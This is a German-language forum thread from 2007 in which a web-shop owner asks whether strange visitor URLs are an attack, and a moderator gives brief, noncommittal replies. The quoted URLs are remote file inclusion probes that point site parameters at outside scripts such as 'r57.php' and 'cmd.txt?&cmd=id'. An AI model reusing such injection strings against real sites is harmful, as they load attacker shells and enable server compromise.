Ist das ein Angriff ??? |
||
|---|---|---|
| #0
| ||
|
20.05.2007, 11:14
...neu hier
Beiträge: 2 |
||
 
|
|
|
|
20.05.2007, 11:58
Moderator
Beiträge: 7805 |
#2
Zumindest ist das PHP Script sehr fragwuerdig..... Wer das nun verursacht kann ich dir nicht sagen, bzw braeuchte man dazu die vollen links
__________ MfG Ralf SEO-Spam Hunter |
|
|
|
|
|
|
20.05.2007, 12:15
...neu hier
Themenstarter Beiträge: 2 |
#3
danke erstmal für die schnelle Antwort.
Welche vollen Links meinst Du denn? Das ist alles was ich im Admin lesen konnte. Diese "Besucher kommen mehrmals täglich auf meine Seite und immer mit wechselnden Links und IPs. Enden tun sie immer verschieden: -boxcrew.t35.com/cmd2.txt?&cmd=id -canaldrop.by.ru/cmd/tool25.txt?&cmd=id -raghatoni.org/cmd.txt?&cmd=id -secretagent.by.ru/r57.php?? -200.181.118.66/.../list.txt?&cmd=id Mfg Mario |
|
|
|
|
|
|
20.05.2007, 12:29
Moderator
Beiträge: 7805 |
#4
Davon sind alle Seiten, bis auch eine, nicht mehr aktiv. Mache eine Googlesuche nach diesen Links und du bekommst einiges an Treffern. In wie weit dadurch versucht wird eine Sicherheitsluecke oder aehnliches auszunutzen, kann ich dir nicht beantworten.
__________ MfG Ralf SEO-Spam Hunter |
|
|
|
|
|
Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!
bitte erst » hier kostenlos registrieren!!
Folgende Themen könnten Dich auch interessieren:
Seite(n): 1
Copyright © 2024, Protecus.de - Protecus Team - Impressum / Mediadaten
ich bin hier neu im Forum und auf der Suche nach Hilfe.
Ich betreibe einen XT:Commerce Shop und habe seit einiger Zeit fragwürdige Besucher auf meiner Seite.
Folgende Sachen kann ich in wer ist online sehen:
IP: 201.26.169.132
http://www.muskelfood.de/index.phpmanu=http://200.181.118.66/.../list.txt?&cmd=id
IP: 83.137.18.34
/index.phpmanu=m4_BestBodyNutrition.html&tg51j32fhtp173lvedplq2/index.php?body=http://secretagent.by.ru/r57.php??
Wer oder was will da was machen? Ist das ein Angriff auf Grund einer Sicherheitslücke?
Ich bin für jede Hilfe dankbar!!
Mfg Mario